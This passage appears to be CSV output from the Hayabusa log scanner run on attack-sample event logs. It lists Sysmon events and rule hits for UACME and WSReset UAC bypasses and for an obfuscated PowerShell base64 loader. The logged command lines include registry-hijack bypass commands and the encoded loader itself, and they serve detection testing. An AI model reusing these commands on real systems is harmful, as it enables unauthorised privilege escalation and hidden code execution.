747F3D96-A105-5D46-0000-001071B8BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,rules/sigma/process_creation/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 
18:34:01.014 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: 
HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC 
Bypass,,rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 
747F3D96-F639-5D53-0000-0010B0FC2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 
21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell 
